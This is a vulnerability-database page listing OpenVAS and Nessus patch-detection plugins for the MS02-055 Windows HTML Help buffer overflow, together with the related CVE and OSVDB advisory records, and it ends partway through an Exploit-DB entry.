Search...

Unchecked Buffer in Windows Help(Q323255)

2005-11-03T00:00:00

ID OPENVAS:136141256231011147
Type openvas
Reporter Copyright (C) 2002 SECNAP Network Security, LLC
Modified 2020-06-09T00:00:00

Description

An unchecked buffer in Windows help could allow an attacker to could gain control over user

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
#
# Unchecked Buffer in Windows Help(Q323255)
#
# Authors:
# Michael Scheidell SECNAP Network Security
#
# Copyright:
# Copyright (C) 2002 SECNAP Network Security, LLC
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.11147");
  script_version("2020-06-09T11:16:08+0000");
  script_tag(name:"last_modification", value:"2020-06-09 11:16:08 +0000 (Tue, 09 Jun 2020)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_bugtraq_id(4387, 5874);
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_cve_id("CVE-2002-0693", "CVE-2002-0694");
  script_name("Unchecked Buffer in Windows Help(Q323255)");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2002 SECNAP Network Security, LLC");
  script_family("Windows : Microsoft Bulletins");
  script_dependencies("secpod_reg_enum.nasl");
  script_mandatory_keys("SMB/registry_enumerated");

  script_tag(name:"summary", value:"An unchecked buffer in Windows help could allow an attacker to
  could gain control over user's system.");

  script_tag(name:"affected", value:"- Microsoft Windows 98

  - Microsoft Windows 98 (Second Edition)

  - Microsoft Windows (Millennium Edition)

  - Microsoft Windows NT 4.0

  - Microsoft Windows NT 4.0 (Terminal Server Edition)

  - Microsoft Windows 2000

  - Microsoft Windows XP");

  script_tag(name:"solution", value:"The vendor has released updates. Please see the references for more information.");

  script_xref(name:"URL", value:"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/ms02-055");

  script_tag(name:"qod_type", value:"registry");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("secpod_reg.inc");

if ( hotfix_check_sp(nt:7, win2k:4, xp:1) &lt;= 0 ) exit(0);
if ( hotfix_missing(name:"Q323255") &gt; 0 )
  security_message(port:0);

JSON Vulners Source

Initial Source

{"id": "OPENVAS:136141256231011147", "type": "openvas", "bulletinFamily": "scanner", "title": "Unchecked Buffer in Windows Help(Q323255)", "description": "An unchecked buffer in Windows help could allow an attacker to\n could gain control over user", "published": "2005-11-03T00:00:00", "modified": "2020-06-09T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011147", "reporter": "Copyright (C) 2002 SECNAP Network Security, LLC", "references": ["https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/ms02-055"], "cvelist": ["CVE-2002-0694", "CVE-2002-0693"], "lastseen": "2020-06-11T15:22:36", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-0693", "CVE-2002-0694"]}, {"type": "nessus", "idList": ["SMB_NT_MS02-055.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:11147"]}, {"type": "osvdb", "idList": ["OSVDB:867", "OSVDB:2992"]}, {"type": "exploitdb", "idList": ["EDB-ID:21902"]}], "modified": "2020-06-11T15:22:36", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2020-06-11T15:22:36", "rev": 2}, "vulnersScore": 7.5}, "pluginID": "136141256231011147", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Unchecked Buffer in Windows Help(Q323255)\n#\n# Authors:\n# Michael Scheidell SECNAP Network Security\n#\n# Copyright:\n# Copyright (C) 2002 SECNAP Network Security, LLC\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11147\");\n script_version(\"2020-06-09T11:16:08+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 11:16:08 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(4387, 5874);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2002-0693\", \"CVE-2002-0694\");\n script_name(\"Unchecked Buffer in Windows Help(Q323255)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2002 SECNAP Network Security, LLC\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"summary\", value:\"An unchecked buffer in Windows help could allow an attacker to\n could gain control over user's system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 98\n\n - Microsoft Windows 98 (Second Edition)\n\n - Microsoft Windows (Millennium Edition)\n\n - Microsoft Windows NT 4.0\n\n - Microsoft Windows NT 4.0 (Terminal Server Edition)\n\n - Microsoft Windows 2000\n\n - Microsoft Windows XP\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/ms02-055\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"secpod_reg.inc\");\n\nif ( hotfix_check_sp(nt:7, win2k:4, xp:1) <= 0 ) exit(0);\nif ( hotfix_missing(name:\"Q323255\") > 0 )\n security_message(port:0);\n", "naslFamily": "Windows : Microsoft Bulletins"}

{"cve": [{"lastseen": "2021-02-02T05:19:06", "description": "Buffer overflow in the HTML Help ActiveX Control (hhctrl.ocx) in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute code via (1) a long parameter to the Alink function, or (2) script containing a long argument to the showHelp function.", "edition": 4, "cvss3": {}, "published": "2002-10-10T04:00:00", "title": "CVE-2002-0693", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2002-0693"], "modified": "2019-04-30T14:27:00", "cpe": ["cpe:/o:microsoft:windows_me:*", "cpe:/o:microsoft:windows_98se:*", "cpe:/o:microsoft:windows_98:*", "cpe:/o:microsoft:windows_2000:*", "cpe:/o:microsoft:windows_xp:*", "cpe:/o:microsoft:windows_2000_terminal_services:*", "cpe:/o:microsoft:windows_nt:4.0"], "id": "CVE-2002-0693", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0693", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_nt:4.0:sp2:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_98:*:gold:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:gold:professional:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:*:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_me:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_98se:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:server:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:19:06", "description": "The HTML Help facility in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP uses the Local Computer Security Zone when opening .chm files from the Temporary Internet Files folder, which allows remote attackers to execute arbitrary code via HTML mail that references or inserts a malicious .chm file containing shortcuts that can be executed, aka \"Code Execution via Compiled HTML Help File.\"", "edition": 4, "cvss3": {}, "published": "2002-10-10T04:00:00", "title": "CVE-2002-0694", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-0694"], "modified": "2019-04-30T14:27:00", "cpe": ["cpe:/o:microsoft:windows_me:*", "cpe:/o:microsoft:windows_98se:*", "cpe:/o:microsoft:windows_98:*", "cpe:/o:microsoft:windows_2000:*", "cpe:/o:microsoft:windows_xp:*", "cpe:/o:microsoft:windows_2000_terminal_services:*", "cpe:/o:microsoft:windows_nt:4.0"], "id": "CVE-2002-0694", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0694", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_nt:4.0:sp2:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_98:*:gold:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:gold:professional:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:*:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_me:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_98se:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:server:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-12-08T11:44:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0694", "CVE-2002-0693"], "description": "An unchecked buffer in Windows help could allow an attacker to\ncould gain control over user's system.\n\nMaximum Severity Rating: Critical \n\nRecommendation: Customers should install the patch immediately. \n\nAffected Software: \n\nMicrosoft Windows 98 \nMicrosoft Windows 98 Second Edition \nMicrosoft Windows Millennium Edition \nMicrosoft Windows NT 4.0 \nMicrosoft Windows NT 4.0, Terminal Server Edition \nMicrosoft Windows 2000 \nMicrosoft Windows XP \n\nSee\nhttp://www.microsoft.com/technet/security/bulletin/ms02-055.mspx", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:11147", "href": "http://plugins.openvas.org/nasl.php?oid=11147", "type": "openvas", "title": "Unchecked Buffer in Windows Help(Q323255)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: smb_nt_ms02-055.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: Unchecked Buffer in Windows Help(Q323255)\n#\n# Authors:\n# Michael Scheidell SECNAP Network Security\n#\n# Copyright:\n# Copyright (C) 2002 SECNAP Network Security, LLC\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"An unchecked buffer in Windows help could allow an attacker to\ncould gain control over user's system.\n\nMaximum Severity Rating: Critical \n\nRecommendation: Customers should install the patch immediately. \n\nAffected Software: \n\nMicrosoft Windows 98 \nMicrosoft Windows 98 Second Edition \nMicrosoft Windows Millennium Edition \nMicrosoft Windows NT 4.0 \nMicrosoft Windows NT 4.0, Terminal Server Edition \nMicrosoft Windows 2000 \nMicrosoft Windows XP \n\nSee\nhttp://www.microsoft.com/technet/security/bulletin/ms02-055.mspx\";\n\nif(description)\n{\n script_id(11147);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(4387, 5874);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2002-0693\", \"CVE-2002-0694\"); \n\n name = \"Unchecked Buffer in Windows Help(Q323255)\";\n \n script_name(name);\n \n\n\n \n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n \n script_copyright(\"This script is Copyright (C) 2002 SECNAP Network Security, LLC\");\n family = \"Windows : Microsoft Bulletins\";\n script_family(family);\n \n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"secpod_reg.inc\");\n\nif ( hotfix_check_sp(nt:7, win2k:4, xp:1) <= 0 ) exit(0);\nif ( hotfix_missing(name:\"Q323255\") > 0 ) \n\tsecurity_message(get_kb_item(\"SMB/transport\"));\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-03-01T06:18:11", "description": "The remote host contains a version of the HTML Helpfacility ActiveX\ncontrol module that could allow an attacker to execute arbitrary code on\nthe remote host by constructing a malicious web page and enticing a\nvictim to visit it.", "edition": 30, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2002-10-24T00:00:00", "title": "MS02-055: Unchecked Buffer in Windows Help Facility Could Enable Code Execution (323255)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0694", "CVE-2002-0693"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS02-055.NASL", "href": "https://www.tenable.com/plugins/nessus/11147", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11147);\n script_version(\"1.44\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2002-0693\", \"CVE-2002-0694\");\n script_bugtraq_id(4387, 5872, 5874);\n script_xref(name:\"MSFT\", value:\"MS02-055\");\n script_xref(name:\"MSKB\", value:\"323255\");\n\n script_name(english:\"MS02-055: Unchecked Buffer in Windows Help Facility Could Enable Code Execution (323255)\");\n script_summary(english:\"Checks for MS Hotfix Q323255, Unchecked Buffer in Windows Help facility\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through the web\nclient.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a version of the HTML Helpfacility ActiveX\ncontrol module that could allow an attacker to execute arbitrary code on\nthe remote host by constructing a malicious web page and enticing a\nvictim to visit it.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2002/ms02-055\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Windows NT, 2000 and XP.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/10/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2002/10/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS02-055';\nkb = '323255';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(nt:'6', win2k:'1,3', xp:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"5.1\", file:\"Hhctrl.ocx\", version:\"5.2.3669.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Hhctrl.ocx\", version:\"5.2.3669.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"4.0\", file:\"Hhctrl.ocx\", version:\"5.2.3669.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-2002-0694"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nOVAL ID: 403\nMicrosoft Security Bulletin: MS02-055\nMicrosoft Knowledge Base Article: 323255\nKeyword: aka \"Code Execution via Compiled HTML Help File\" \nISS X-Force ID: 10254\n[CVE-2002-0694](https://vulners.com/cve/CVE-2002-0694)\nCIAC Advisory: n-002\n", "modified": "2002-10-02T00:00:00", "published": "2002-10-02T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:867", "id": "OSVDB:867", "title": "Microsoft Windows Compiled HTML Help (.chm) Arbitrary Command Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:57", "bulletinFamily": "software", "cvelist": ["CVE-2002-0693"], "edition": 1, "description": "## Vulnerability Description\nMicrosoft Windows HTML Help ActiveX Control contains a flaw that allows remote attackers to execute arbitrary code. The flaw occurs due to an unchecked buffer in the hhctrl.ocx file. This can be exploited by using a long parameter to the \"Alink\" function or a script containing a long argument to the \"showHelp\" function.\n\n## Technical Description\nHTML Help ActiveX control ships as part of Microsoft HTML Help, and is designed to work with Internet Explorer to provide functionality for help systems.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch (Q323255) to address this vulnerability.\n\n## Short Description\nMicrosoft Windows HTML Help ActiveX Control contains a flaw that allows remote attackers to execute arbitrary code. The flaw occurs due to an unchecked buffer in the hhctrl.ocx file. This can be exploited by using a long parameter to the \"Alink\" function or a script containing a long argument to the \"showHelp\" function.\n\n## References:\nVendor Specific Solution URL: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=40213\nMicrosoft Security Bulletin: MS02-055\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=103419115517344&w=2\nISS X-Force ID: 10253\n[CVE-2002-0693](https://vulners.com/cve/CVE-2002-0693)\nBugtraq ID: 5874\n", "modified": "2002-10-03T00:00:00", "published": "2002-10-03T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:2992", "id": "OSVDB:2992", "title": "Microsoft IE HTML Help ActiveX Control alink and showHelp Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T17:32:14", "description": "MS Windows XP/2000/NT 4 Help Facility ActiveX Control Buffer Overflow. CVE-2002-0693. Remote exploit for windows platform", "published": "2002-10-07T00:00:00", "type": "exploitdb", "title": "Microsoft Windows 2000/XP/NT 4 - Help Facility ActiveX Control Buffer Overflow", "bulletinFamily": 